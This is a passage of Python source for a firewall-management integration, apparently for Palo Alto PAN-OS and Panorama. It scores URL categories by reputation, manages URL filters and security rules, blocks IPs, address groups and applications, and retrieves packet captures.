For more information:\n https://knowledgebase.paloaltonetworks.com/KCSArticleDetail?id=kA10g000000Cm5hCAC\n\n Args:\n category: the URL category from URLFiltering\n\n Returns:\n dbot score.\n \"\"\"\n predefined_suspicious = ['high-risk', 'medium-risk', 'hacking', 'proxy-avoidance-and-anonymizers', 'grayware',\n 'not-resolved']\n suspicious_categories = list((set(additional_suspicious)).union(set(predefined_suspicious)))\n\n predefined_malicious = ['phishing', 'command-and-control', 'malware']\n malicious_categories = list((set(additional_malicious)).union(set(predefined_malicious)))\n\n dbot_score = 1\n if category in malicious_categories:\n dbot_score = 3\n elif category in suspicious_categories:\n dbot_score = 2\n elif category == 'unknown':\n dbot_score = 0\n\n return dbot_score\n\n\ndef panorama_get_url_category_command(url_cmd: str, url: str, additional_suspicious: list, additional_malicious: list):\n \"\"\"\n Get the url category from Palo Alto URL Filtering\n \"\"\"\n urls = argToList(url)\n\n categories_dict: Dict[str, list] = {}\n categories_dict_hr: Dict[str, list] = {}\n command_results: List[CommandResults] = []\n for url in urls:\n category = panorama_get_url_category(url_cmd, url)\n if category in categories_dict:\n categories_dict[category].append(url)\n categories_dict_hr[category].append(url)\n else:\n categories_dict[category] = [url]\n categories_dict_hr[category] = [url]\n context_urls = populate_url_filter_category_from_context(category)\n categories_dict[category] = list((set(categories_dict[category])).union(set(context_urls)))\n\n score = calculate_dbot_score(category.lower(), additional_suspicious, additional_malicious)\n dbot_score = Common.DBotScore(\n indicator=url,\n indicator_type=DBotScoreType.URL,\n integration_name='PAN-OS',\n score=score\n )\n url_obj = Common.URL(\n url=url,\n dbot_score=dbot_score,\n category=category\n )\n command_results.append(CommandResults(\n indicator=url_obj,\n readable_output=tableToMarkdown('URL', url_obj.to_context())\n ))\n\n url_category_output_hr = []\n for key, value in categories_dict_hr.items():\n url_category_output_hr.append({\n 'Category': key,\n 'URL': value\n })\n\n url_category_output = []\n for key, value in categories_dict.items():\n url_category_output.append({\n 'Category': key,\n 'URL': value\n })\n\n title = 'URL Filtering'\n if url_cmd == 'url-info-cloud':\n title += ' from cloud'\n elif url_cmd == 'url-info-host':\n title += ' from host'\n human_readable = tableToMarkdown(f'{title}:', url_category_output_hr, ['URL', 'Category'], removeNull=True)\n\n command_results.insert(0, CommandResults(\n outputs_prefix='Panorama.URLFilter',\n outputs_key_field='Category',\n outputs=url_category_output,\n readable_output=human_readable,\n raw_response=categories_dict,\n ))\n return_results(command_results)\n\n\n''' URL Filter '''\n\n\ndef prettify_get_url_filter(url_filter: dict):\n pretty_url_filter = {'Name': url_filter['@name']}\n if DEVICE_GROUP:\n pretty_url_filter['DeviceGroup'] = DEVICE_GROUP\n if 'description' in url_filter:\n pretty_url_filter['Description'] = url_filter['description']\n\n pretty_url_filter['Category'] = []\n alert_category_list = []\n block_category_list = []\n allow_category_list = []\n continue_category_list = []\n override_category_list = []\n\n if 'alert' in url_filter:\n alert_category_list = url_filter['alert']['member']\n if 'block' in url_filter:\n block_category_list = url_filter['block']['member']\n if 'allow' in url_filter:\n allow_category_list = url_filter['allow']['member']\n if 
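# --- Editor's illustration (not part of the integration code) ---
# A minimal, self-contained sketch of the scoring rule implemented by
# calculate_dbot_score() above: malicious categories take precedence over
# suspicious ones, 'unknown' maps to 0, and anything else defaults to 1 (good).
# The category names below are the predefined sets from that function; in the
# integration, extra names arrive via additional_suspicious/additional_malicious.
def _demo_dbot_score(category: str) -> int:
    malicious = {'phishing', 'command-and-control', 'malware'}
    suspicious = {'high-risk', 'medium-risk', 'hacking',
                  'proxy-avoidance-and-anonymizers', 'grayware', 'not-resolved'}
    if category in malicious:
        return 3
    if category in suspicious:
        return 2
    return 0 if category == 'unknown' else 1

assert _demo_dbot_score('malware') == 3
assert _demo_dbot_score('grayware') == 2
assert _demo_dbot_score('news') == 1
# --- end illustration ---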
'continue' in url_filter:\n        continue_category_list = url_filter['continue']['member']\n    if 'override' in url_filter:\n        override_category_list = url_filter['override']['member']\n\n    for category in alert_category_list:\n        pretty_url_filter['Category'].append({\n            'Name': category,\n            'Action': 'alert'\n        })\n    for category in block_category_list:\n        pretty_url_filter['Category'].append({\n            'Name': category,\n            'Action': 'block'\n        })\n    for category in allow_category_list:\n        pretty_url_filter['Category'].append({\n            'Name': category,\n            'Action': 'allow'\n        })\n    for category in continue_category_list:\n        pretty_url_filter['Category'].append({\n            'Name': category,\n            'Action': 'continue'\n        })\n    for category in override_category_list:\n        pretty_url_filter['Category'].append({\n            'Name': category,\n            'Action': 'override'\n        })\n\n    if 'allow-list' in url_filter or 'block-list' in url_filter:\n        pretty_url_filter['Overrides'] = []\n        if 'allow-list' in url_filter:\n            pretty_url_filter['OverrideAllowList'] = url_filter['allow-list']['member']\n        else:\n            pretty_url_filter['OverrideBlockList'] = url_filter['block-list']['member']\n    return pretty_url_filter\n\n\n
@logger\ndef panorama_get_url_filter(name: str):\n    params = {\n        'action': 'get',\n        'type': 'config',\n        'xpath': XPATH_OBJECTS + \"profiles/url-filtering/entry[@name='\" + name + \"']\",\n        'key': API_KEY\n    }\n    result = http_request(\n        URL,\n        'GET',\n        params=params,\n    )\n\n    return result['response']['result']['entry']\n\n\n
def panorama_get_url_filter_command(name: str):\n    \"\"\"\n    Get a URL Filter\n    \"\"\"\n\n    url_filter = panorama_get_url_filter(name)\n\n    url_filter_output = prettify_get_url_filter(url_filter)\n\n    return_results({\n        'Type': entryTypes['note'],\n        'ContentsFormat': formats['json'],\n        'Contents': url_filter,\n        'ReadableContentsFormat': formats['markdown'],\n        'HumanReadable': tableToMarkdown('URL Filter:', url_filter_output,\n                                         ['Name', 'Category', 'OverrideAllowList', 'OverrideBlockList', 'Description'],\n                                         removeNull=True),\n        'EntryContext': {\n            \"Panorama.URLFilter(val.Name == obj.Name)\": url_filter_output\n        }\n    })\n\n\n
@logger\ndef panorama_create_url_filter(\n        url_filter_name: str, action: str,\n        url_category_list: str,\n        override_allow_list: Optional[str] = None,\n        override_block_list: Optional[str] = None,\n        description: Optional[str] = None):\n    element = add_argument_list(url_category_list, action, True) + add_argument_list(override_allow_list, 'allow-list',\n                                                                                    True) + add_argument_list(\n        override_block_list, 'block-list', True) + add_argument(description, 'description',\n                                                                False) + \"<action>block</action>\"\n\n    params = {\n        'action': 'set',\n        'type': 'config',\n        'xpath': XPATH_OBJECTS + \"profiles/url-filtering/entry[@name='\" + url_filter_name + \"']\",\n        'element': element,\n        'key': API_KEY\n    }\n    result = http_request(\n        URL,\n        'POST',\n        body=params,\n    )\n    return result\n\n\n
def panorama_create_url_filter_command(args: dict):\n    \"\"\"\n    Create a URL Filter\n    \"\"\"\n    url_filter_name = args['name']\n    action = args['action']\n    url_category_list = argToList(args['url_category'])\n    override_allow_list = argToList(args.get('override_allow_list'))\n    override_block_list = argToList(args.get('override_block_list'))\n    description = args.get('description')\n\n    result = panorama_create_url_filter(url_filter_name, action, url_category_list, override_allow_list,\n                                        override_block_list, description)\n\n    url_filter_output = {'Name': url_filter_name}\n    if DEVICE_GROUP:\n        url_filter_output['DeviceGroup'] = DEVICE_GROUP\n    url_filter_output['Category'] = []\n    for category in 
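# --- Editor's illustration (not part of the integration code) ---
# The 'element' strings sent to the config API are assembled by small XML
# helpers (add_argument, add_argument_list) defined earlier in this file. A
# rough sketch of the shape of XML they appear to produce, inferred from the
# call sites here rather than copied from the helpers themselves:
def _demo_add_argument(value, field_name):
    # e.g. ('my filter', 'description') -> '<description>my filter</description>'
    return f'<{field_name}>{value}</{field_name}>' if value else ''

def _demo_add_argument_list(values, field_name):
    # e.g. (['gambling', 'hacking'], 'block') ->
    #   '<block><member>gambling</member><member>hacking</member></block>'
    if not values:
        return ''
    members = ''.join(f'<member>{value}</member>' for value in values)
    return f'<{field_name}>{members}</{field_name}>'

assert _demo_add_argument('', 'description') == ''
print(_demo_add_argument_list(['gambling', 'hacking'], 'block'))
# --- end illustration ---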
url_category_list:\n url_filter_output['Category'].append({\n 'Name': category,\n 'Action': action\n })\n if override_allow_list:\n url_filter_output['OverrideAllowList'] = override_allow_list\n if override_block_list:\n url_filter_output['OverrideBlockList'] = override_block_list\n if description:\n url_filter_output['Description'] = description\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'URL Filter was created successfully.',\n 'EntryContext': {\n \"Panorama.URLFilter(val.Name == obj.Name)\": url_filter_output\n }\n })\n\n\n@logger\ndef panorama_edit_url_filter(url_filter_name: str, element_to_change: str, element_value: str,\n add_remove_element: Optional[str] = None):\n url_filter_prev = panorama_get_url_filter(url_filter_name)\n if '@dirtyId' in url_filter_prev:\n LOG(f'Found uncommitted item:\\n{url_filter_prev}')\n raise Exception('Please commit the instance prior to editing the URL Filter.')\n\n url_filter_output: Dict[str, Any] = {'Name': url_filter_name}\n if DEVICE_GROUP:\n url_filter_output['DeviceGroup'] = DEVICE_GROUP\n params = {\n 'action': 'edit',\n 'type': 'config',\n 'key': API_KEY,\n }\n\n if element_to_change == 'description':\n params['xpath'] = XPATH_OBJECTS + f\"profiles/url-filtering/entry[@name='{url_filter_name}']/{element_to_change}\"\n params['element'] = add_argument_open(element_value, 'description', False)\n result = http_request(URL, 'POST', body=params)\n url_filter_output['Description'] = element_value\n\n elif element_to_change == 'override_allow_list':\n prev_override_allow_list = argToList(url_filter_prev['allow-list']['member'])\n if add_remove_element == 'add':\n new_override_allow_list = list((set(prev_override_allow_list)).union(set([element_value])))\n else:\n new_override_allow_list = [url for url in prev_override_allow_list if url != element_value]\n\n params['xpath'] = XPATH_OBJECTS + \"profiles/url-filtering/entry[@name='\" + url_filter_name + \"']/allow-list\"\n params['element'] = add_argument_list(new_override_allow_list, 'allow-list', True)\n result = http_request(URL, 'POST', body=params)\n url_filter_output[element_to_change] = new_override_allow_list\n\n # element_to_change == 'override_block_list'\n else:\n prev_override_block_list = argToList(url_filter_prev['block-list']['member'])\n if add_remove_element == 'add':\n new_override_block_list = list((set(prev_override_block_list)).union(set([element_value])))\n else:\n new_override_block_list = [url for url in prev_override_block_list if url != element_value]\n\n params['xpath'] = XPATH_OBJECTS + \"profiles/url-filtering/entry[@name='\" + url_filter_name + \"']/block-list\"\n params['element'] = add_argument_list(new_override_block_list, 'block-list', True)\n result = http_request(URL, 'POST', body=params)\n url_filter_output[element_to_change] = new_override_block_list\n\n return result, url_filter_output\n\n\ndef panorama_edit_url_filter_command(args: dict):\n \"\"\"\n Edit a URL Filter\n \"\"\"\n url_filter_name = args['name']\n element_to_change = args['element_to_change']\n add_remove_element = args['add_remove_element']\n element_value = args['element_value']\n\n result, url_filter_output = panorama_edit_url_filter(url_filter_name, element_to_change, element_value,\n add_remove_element)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 
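# --- Editor's illustration (not part of the integration code) ---
# panorama_edit_url_filter() above implements 'add' as a set union with the
# existing override list and 'remove' as a filtering list comprehension, so
# adds are idempotent and removes drop every occurrence. Standalone sketch:
def _demo_edit_override_list(current: list, value: str, action: str) -> list:
    if action == 'add':
        return list(set(current) | {value})
    return [url for url in current if url != value]

assert sorted(_demo_edit_override_list(['a.com'], 'b.com', 'add')) == ['a.com', 'b.com']
assert _demo_edit_override_list(['a.com', 'b.com'], 'a.com', 'remove') == ['b.com']
# --- end illustration ---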
'HumanReadable': 'URL Filter was edited successfully.',\n        'EntryContext': {\n            \"Panorama.URLFilter(val.Name == obj.Name)\": url_filter_output\n        }\n    })\n\n\n
@logger\ndef panorama_delete_url_filter(url_filter_name: str):\n    params = {\n        'action': 'delete',\n        'type': 'config',\n        'xpath': XPATH_OBJECTS + \"profiles/url-filtering/entry[@name='\" + url_filter_name + \"']\",\n        'element': \"\",\n        'key': API_KEY\n    }\n\n    result = http_request(\n        URL,\n        'POST',\n        body=params,\n    )\n\n    return result\n\n\n
def panorama_delete_url_filter_command(url_filter_name: str):\n    \"\"\"\n    Delete a URL filter\n    \"\"\"\n\n    result = panorama_delete_url_filter(url_filter_name)\n\n    url_filter_output = {'Name': url_filter_name}\n    if DEVICE_GROUP:\n        url_filter_output['DeviceGroup'] = DEVICE_GROUP\n\n    return_results({\n        'Type': entryTypes['note'],\n        'ContentsFormat': formats['json'],\n        'Contents': result,\n        'ReadableContentsFormat': formats['text'],\n        'HumanReadable': 'URL Filter was deleted successfully.',\n        'EntryContext': {\n            \"Panorama.URLFilter(val.Name == obj.Name)\": url_filter_output\n        }\n    })\n\n\n''' Security Rules Managing '''\n\n\n
def prettify_rule(rule: dict):\n    pretty_rule = {\n        'Name': rule['@name'],\n        'Action': rule['action']\n    }\n    if DEVICE_GROUP:\n        pretty_rule['DeviceGroup'] = DEVICE_GROUP\n    if '@loc' in rule:\n        pretty_rule['Location'] = rule['@loc']\n    if 'category' in rule and 'member' in rule['category']:\n        pretty_rule['CustomUrlCategory'] = rule['category']['member']\n    if 'application' in rule and 'member' in rule['application']:\n        pretty_rule['Application'] = rule['application']['member']\n    if 'destination' in rule and 'member' in rule['destination']:\n        pretty_rule['Destination'] = rule['destination']['member']\n    if 'from' in rule and 'member' in rule['from']:\n        pretty_rule['From'] = rule['from']['member']\n    if 'service' in rule and 'member' in rule['service']:\n        pretty_rule['Service'] = rule['service']['member']\n    if 'to' in rule and 'member' in rule['to']:\n        pretty_rule['To'] = rule['to']['member']\n    if 'source' in rule and 'member' in rule['source']:\n        pretty_rule['Source'] = rule['source']['member']\n    if 'tag' in rule and 'member' in rule['tag']:\n        pretty_rule['Tags'] = rule['tag']['member']\n    if 'log-setting' in rule and '#text' in rule['log-setting']:\n        pretty_rule['LogForwardingProfile'] = rule['log-setting']['#text']\n\n    return pretty_rule\n\n\n
def prettify_rules(rules: Union[List[dict], dict]):\n    if not isinstance(rules, list):\n        return prettify_rule(rules)\n    pretty_rules_arr = []\n    for rule in rules:\n        pretty_rule = prettify_rule(rule)\n        pretty_rules_arr.append(pretty_rule)\n\n    return pretty_rules_arr\n\n\n
@logger\ndef panorama_list_rules(xpath: str, tag: str = None):\n    params = {\n        'action': 'get',\n        'type': 'config',\n        'xpath': xpath,\n        'key': API_KEY\n    }\n\n    if tag:\n        params[\"xpath\"] = f'{params[\"xpath\"]}[( tag/member = \\'{tag}\\')]'\n\n    result = http_request(\n        URL,\n        'GET',\n        params=params,\n    )\n\n    return result['response']['result']['entry']\n\n\n
def panorama_list_rules_command(tag: str):\n    \"\"\"\n    List security rules\n    \"\"\"\n    if DEVICE_GROUP:\n        if not PRE_POST:\n            raise Exception('Please provide the pre_post argument when listing rules in Panorama instance.')\n        else:\n            xpath = XPATH_SECURITY_RULES + PRE_POST + '/security/rules/entry'\n    else:\n        xpath = XPATH_SECURITY_RULES\n\n    rules = panorama_list_rules(xpath, tag)\n    pretty_rules = prettify_rules(rules)\n\n    return_results({\n        'Type': entryTypes['note'],\n        'ContentsFormat': formats['json'],\n        'Contents': rules,\n        
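# Editor's note: panorama_list_rules() above pushes tag filtering into the
# xpath itself via a predicate on tag/member, so matching happens server-side,
# e.g. (path and tag values assumed for illustration):
#   .../rulebase/security/rules/entry[( tag/member = 'blocked')]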
'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Security Rules:', pretty_rules,\n ['Name', 'Location', 'Action', 'From', 'To',\n 'CustomUrlCategory', 'Service', 'Tags'],\n removeNull=True),\n 'EntryContext': {\n \"Panorama.SecurityRule(val.Name == obj.Name)\": pretty_rules\n }\n })\n\n\n@logger\ndef panorama_move_rule_command(args: dict):\n \"\"\"\n Move a security rule\n \"\"\"\n rulename = args['rulename']\n params = {\n 'type': 'config',\n 'action': 'move',\n 'key': API_KEY,\n 'where': args['where'],\n }\n\n if DEVICE_GROUP:\n if not PRE_POST:\n raise Exception('Please provide the pre_post argument when moving a rule in Panorama instance.')\n else:\n params['xpath'] = XPATH_SECURITY_RULES + PRE_POST + '/security/rules/entry' + '[@name=\\'' + rulename + '\\']'\n else:\n params['xpath'] = XPATH_SECURITY_RULES + '[@name=\\'' + rulename + '\\']'\n\n if 'dst' in args:\n params['dst'] = args['dst']\n\n result = http_request(URL, 'POST', body=params)\n rule_output = {'Name': rulename}\n if DEVICE_GROUP:\n rule_output['DeviceGroup'] = DEVICE_GROUP\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Rule ' + rulename + ' moved successfully.',\n 'EntryContext': {\n \"Panorama.SecurityRule(val.Name == obj.Name)\": rule_output\n }\n })\n\n\n''' Security Rule Configuration '''\n\n\n@logger\ndef panorama_create_rule_command(args: dict):\n \"\"\"\n Create a security rule\n \"\"\"\n rulename = args['rulename'] if 'rulename' in args else ('demisto-' + (str(uuid.uuid4()))[:8])\n source = argToList(args.get('source'))\n destination = argToList(args.get('destination'))\n source_zone = argToList(args.get('source_zone'))\n destination_zone = argToList(args.get('destination_zone'))\n negate_source = args.get('negate_source')\n negate_destination = args.get('negate_destination')\n action = args.get('action')\n service = args.get('service')\n disable = args.get('disable')\n categories = argToList(args.get('category'))\n application = argToList(args.get('application'))\n source_user = args.get('source_user')\n disable_server_response_inspection = args.get('disable_server_response_inspection')\n description = args.get('description')\n target = args.get('target')\n log_forwarding = args.get('log_forwarding', None)\n tags = argToList(args['tags']) if 'tags' in args else None\n profile_setting = args.get('profile_setting')\n\n if not DEVICE_GROUP:\n if target:\n raise Exception('The target argument is relevant only for a Palo Alto Panorama instance.')\n elif log_forwarding:\n raise Exception('The log_forwarding argument is relevant only for a Palo Alto Panorama instance.')\n\n params = prepare_security_rule_params(api_action='set', rulename=rulename, source=source, destination=destination,\n negate_source=negate_source, negate_destination=negate_destination,\n action=action, service=service,\n disable=disable, application=application, source_user=source_user,\n disable_server_response_inspection=disable_server_response_inspection,\n description=description, target=target,\n log_forwarding=log_forwarding, tags=tags, category=categories,\n from_=source_zone, to=destination_zone, profile_setting=profile_setting)\n result = http_request(\n URL,\n 'POST',\n body=params\n )\n\n rule_output = {SECURITY_RULE_ARGS[key]: value for key, value in args.items() if key in SECURITY_RULE_ARGS}\n rule_output['Name'] = rulename\n if DEVICE_GROUP:\n rule_output['DeviceGroup'] = 
DEVICE_GROUP\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Rule configured successfully.',\n 'EntryContext': {\n \"Panorama.SecurityRule(val.Name == obj.Name)\": rule_output\n }\n })\n\n\n@logger\ndef panorama_get_current_element(element_to_change: str, xpath: str) -> list:\n \"\"\"\n Get the current element value from\n \"\"\"\n params = {\n 'type': 'config',\n 'action': 'get',\n 'xpath': xpath,\n 'key': API_KEY\n }\n try:\n response = http_request(URL, 'GET', params=params)\n except PAN_OS_Not_Found:\n return []\n\n result = response.get('response').get('result')\n if '@dirtyId' in result:\n LOG(f'Found uncommitted item:\\n{result}')\n raise Exception('Please commit the instance prior to editing the Security rule.')\n current_object = result.get(element_to_change)\n if 'list' in current_object:\n current_objects_items = argToList(current_object['list']['member'])\n elif 'member' in current_object:\n current_objects_items = argToList(current_object.get('member'))\n\n return current_objects_items\n\n\n@logger\ndef panorama_edit_rule_items(rulename: str, element_to_change: str, element_value: List[str], behaviour: str):\n listable_elements = ['source', 'destination', 'application', 'category', 'source-user', 'service', 'tag']\n if element_to_change not in listable_elements:\n raise Exception(f'Adding objects is only available for the following Objects types:{listable_elements}')\n if element_to_change == 'target' and not DEVICE_GROUP:\n raise Exception('The target argument is relevant only for a Palo Alto Panorama instance.')\n\n params = {\n 'type': 'config',\n 'action': 'edit',\n 'key': API_KEY\n }\n\n if DEVICE_GROUP:\n if not PRE_POST:\n raise Exception('please provide the pre_post argument when editing a rule in Panorama instance.')\n else:\n params['xpath'] = XPATH_SECURITY_RULES + PRE_POST + '/security/rules/entry' + '[@name=\\'' + rulename + '\\']'\n else:\n params['xpath'] = XPATH_SECURITY_RULES + '[@name=\\'' + rulename + '\\']'\n params[\"xpath\"] = f'{params[\"xpath\"]}/' + element_to_change\n\n current_objects_items = panorama_get_current_element(element_to_change, params['xpath'])\n if behaviour == 'add':\n values = list((set(current_objects_items)).union(set(element_value)))\n else: # remove\n values = [item for item in current_objects_items if item not in element_value]\n if not values:\n raise Exception(f'The object: {element_to_change} must have at least one item.')\n\n params['element'] = add_argument_list(values, element_to_change, True)\n result = http_request(URL, 'POST', body=params)\n rule_output = {\n 'Name': rulename,\n SECURITY_RULE_ARGS[element_to_change]: values\n }\n if DEVICE_GROUP:\n rule_output['DeviceGroup'] = DEVICE_GROUP\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Rule edited successfully.',\n 'EntryContext': {\n \"Panorama.SecurityRule(val.Name == obj.Name)\": rule_output\n }\n })\n\n\n@logger\ndef panorama_edit_rule_command(args: dict):\n \"\"\"\n Edit a security rule\n \"\"\"\n rulename = args['rulename']\n element_to_change = args['element_to_change']\n if element_to_change == 'log-forwarding':\n element_to_change = 'log-setting'\n element_value = args['element_value']\n\n if element_to_change == 'target' and not DEVICE_GROUP:\n raise Exception('The target argument is relevant only for a Palo 
Alto Panorama instance.')\n\n behaviour = args.get('behaviour') if 'behaviour' in args else 'replace'\n if behaviour != 'replace':\n panorama_edit_rule_items(rulename, element_to_change, argToList(element_value), behaviour)\n else:\n params = {\n 'type': 'config',\n 'action': 'edit',\n 'key': API_KEY\n }\n\n if element_to_change in ['action', 'description', 'log-setting']:\n params['element'] = add_argument_open(element_value, element_to_change, False)\n elif element_to_change in ['source', 'destination', 'application', 'category', 'source-user', 'service', 'tag']:\n element_value = argToList(element_value)\n params['element'] = add_argument_list(element_value, element_to_change, True)\n elif element_to_change == 'target':\n params['element'] = add_argument_target(element_value, 'target')\n elif element_to_change == 'profile-setting':\n params['element'] = add_argument_profile_setting(element_value, 'profile-setting')\n else:\n params['element'] = add_argument_yes_no(element_value, element_to_change)\n\n if DEVICE_GROUP:\n if not PRE_POST:\n raise Exception('please provide the pre_post argument when editing a rule in Panorama instance.')\n else:\n params['xpath'] = XPATH_SECURITY_RULES + PRE_POST + f'/security/rules/entry[@name=\\'{rulename}\\']'\n else:\n params['xpath'] = XPATH_SECURITY_RULES + '[@name=\\'' + rulename + '\\']'\n params['xpath'] += '/' + element_to_change\n\n result = http_request(URL, 'POST', body=params)\n\n rule_output = {\n 'Name': rulename,\n SECURITY_RULE_ARGS[element_to_change]: element_value\n }\n if DEVICE_GROUP:\n rule_output['DeviceGroup'] = DEVICE_GROUP\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Rule edited successfully.',\n 'EntryContext': {\n \"Panorama.SecurityRule(val.Name == obj.Name)\": rule_output\n }\n })\n\n\n@logger\ndef panorama_delete_rule_command(rulename: str):\n \"\"\"\n Delete a security rule\n \"\"\"\n params = {\n 'type': 'config',\n 'action': 'delete',\n 'key': API_KEY\n }\n if DEVICE_GROUP:\n if not PRE_POST:\n raise Exception('Please provide the pre_post argument when moving a rule in Panorama instance.')\n else:\n params['xpath'] = XPATH_SECURITY_RULES + PRE_POST + '/security/rules/entry' + '[@name=\\'' + rulename + '\\']'\n else:\n params['xpath'] = XPATH_SECURITY_RULES + '[@name=\\'' + rulename + '\\']'\n\n result = http_request(\n URL,\n 'POST',\n body=params\n )\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Rule deleted successfully.',\n })\n\n\n@logger\ndef panorama_custom_block_rule_command(args: dict):\n \"\"\"\n Block an object in Panorama\n \"\"\"\n object_type = args['object_type']\n object_value = argToList(args['object_value'])\n direction = args['direction'] if 'direction' in args else 'both'\n rulename = args['rulename'] if 'rulename' in args else ('demisto-' + (str(uuid.uuid4()))[:8])\n block_destination = False if direction == 'from' else True\n block_source = False if direction == 'to' else True\n target = argToList(args.get('target')) if 'target' in args else None\n log_forwarding = args.get('log_forwarding', None)\n tags = argToList(args['tags']) if 'tags' in args else None\n\n if not DEVICE_GROUP:\n if target:\n raise Exception('The target argument is relevant only for a Palo Alto Panorama instance.')\n elif log_forwarding:\n raise Exception('The log_forwarding 
argument is relevant only for a Palo Alto Panorama instance.')\n\n custom_block_output = {\n 'Name': rulename,\n 'Direction': direction,\n 'Disabled': False\n }\n if DEVICE_GROUP:\n custom_block_output['DeviceGroup'] = DEVICE_GROUP\n if log_forwarding:\n custom_block_output['LogForwarding'] = log_forwarding\n if target:\n custom_block_output['Target'] = target\n if tags:\n custom_block_output['Tags'] = tags\n\n if object_type == 'ip':\n if block_source:\n params = prepare_security_rule_params(api_action='set', action='drop', source=object_value,\n destination=['any'], rulename=rulename + '-from', target=target,\n log_forwarding=log_forwarding, tags=tags)\n result = http_request(URL, 'POST', body=params)\n if block_destination:\n params = prepare_security_rule_params(api_action='set', action='drop', destination=object_value,\n source=['any'], rulename=rulename + '-to', target=target,\n log_forwarding=log_forwarding, tags=tags)\n result = http_request(URL, 'POST', body=params)\n custom_block_output['IP'] = object_value\n\n elif object_type in ['address-group', 'edl']:\n if block_source:\n params = prepare_security_rule_params(api_action='set', action='drop', source=object_value,\n destination=['any'], rulename=rulename + '-from', target=target,\n log_forwarding=log_forwarding, tags=tags)\n result = http_request(URL, 'POST', body=params)\n if block_destination:\n params = prepare_security_rule_params(api_action='set', action='drop', destination=object_value,\n source=['any'], rulename=rulename + '-to', target=target,\n log_forwarding=log_forwarding, tags=tags)\n result = http_request(URL, 'POST', body=params)\n custom_block_output['AddressGroup'] = object_value\n\n elif object_type == 'url-category':\n params = prepare_security_rule_params(api_action='set', action='drop', source=['any'], destination=['any'],\n category=object_value, rulename=rulename, target=target,\n log_forwarding=log_forwarding, tags=tags)\n result = http_request(URL, 'POST', body=params)\n custom_block_output['CustomURLCategory'] = object_value\n\n elif object_type == 'application':\n params = prepare_security_rule_params(api_action='set', action='drop', source=['any'], destination=['any'],\n application=object_value, rulename=rulename, target=target,\n log_forwarding=log_forwarding, tags=tags)\n result = http_request(URL, 'POST', body=params)\n custom_block_output['Application'] = object_value\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Object was blocked successfully.',\n 'EntryContext': {\n \"Panorama.SecurityRule(val.Name == obj.Name)\": custom_block_output\n }\n })\n\n\n''' PCAPS '''\n\n\n@logger\ndef panorama_list_pcaps_command(args: dict):\n \"\"\"\n Get list of pcap files\n \"\"\"\n pcap_type = args['pcapType']\n params = {\n 'type': 'export',\n 'key': API_KEY,\n 'category': pcap_type\n }\n\n if 'password' in args:\n params['dlp-password'] = args['password']\n elif args['pcapType'] == 'dlp-pcap':\n raise Exception('can not provide dlp-pcap without password')\n\n serial_number = args.get('serialNumber')\n if VSYS and serial_number:\n raise Exception('The serialNumber argument can only be used in a Panorama instance configuration')\n elif DEVICE_GROUP and not serial_number:\n raise Exception('PCAP listing is only supported on Panorama with the serialNumber argument.')\n elif serial_number:\n params['target'] = serial_number\n\n result = http_request(URL, 'GET', params=params, 
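# Editor's note: the direction argument above ('from'/'to'/'both') expands into
# two booleans, block_source = direction != 'to' and
# block_destination = direction != 'from'; the default 'both' therefore creates
# a pair of drop rules suffixed '-from' and '-to'.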
is_pcap=True)\n json_result = json.loads(xml2json(result.text))['response']\n if json_result['@status'] != 'success':\n raise Exception('Request to get list of Pcaps Failed.\\nStatus code: ' + str(\n json_result['response']['@code']) + '\\nWith message: ' + str(json_result['response']['msg']['line']))\n\n dir_listing = json_result['result']['dir-listing']\n if 'file' not in dir_listing:\n return_results(f'PAN-OS has no Pcaps of type: {pcap_type}.')\n else:\n pcaps = dir_listing['file']\n pcap_list = [pcap[1:] for pcap in pcaps]\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': json_result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('List of Pcaps:', pcap_list, ['Pcap name']),\n 'EntryContext': {\n \"Panorama.Pcaps(val.Name == obj.Name)\": pcap_list\n }\n })\n\n\ndef validate_search_time(search_time: str) -> str:\n \"\"\"\n Validate search_time is of format YYYY/MM/DD HH:MM:SS or YYYY/MM/DD and pad with zeroes\n \"\"\"\n try:\n datetime.strptime(search_time, '%Y/%m/%d')\n search_time += ' 00:00:00'\n return search_time\n except ValueError:\n pass\n try:\n datetime.strptime(search_time, '%Y/%m/%d %H:%M:%S')\n return search_time\n except ValueError as err:\n raise ValueError(f\"Incorrect data format. searchTime should be of: YYYY/MM/DD HH:MM:SS or YYYY/MM/DD.\\n\"\n f\"Error is: {str(err)}\")\n\n\n@logger\ndef panorama_get_pcap_command(args: dict):\n \"\"\"\n Get pcap file\n \"\"\"\n pcap_type = args['pcapType']\n params = {\n 'type': 'export',\n 'key': API_KEY,\n 'category': pcap_type\n }\n\n password = args.get('password')\n pcap_id = args.get('pcapID')\n search_time = args.get('searchTime')\n\n if pcap_type == 'dlp-pcap' and not password:\n raise Exception('Can not download dlp-pcap without the password argument.')\n else:\n params['dlp-password'] = password\n if pcap_type == 'threat-pcap' and (not pcap_id or not search_time):\n raise Exception('Can not download threat-pcap without the pcapID and the searchTime arguments.')\n\n pcap_name = args.get('from')\n local_name = args.get('localName')\n serial_no = args.get('serialNo')\n session_id = args.get('sessionID')\n device_name = args.get('deviceName')\n\n serial_number = args.get('serialNumber')\n if 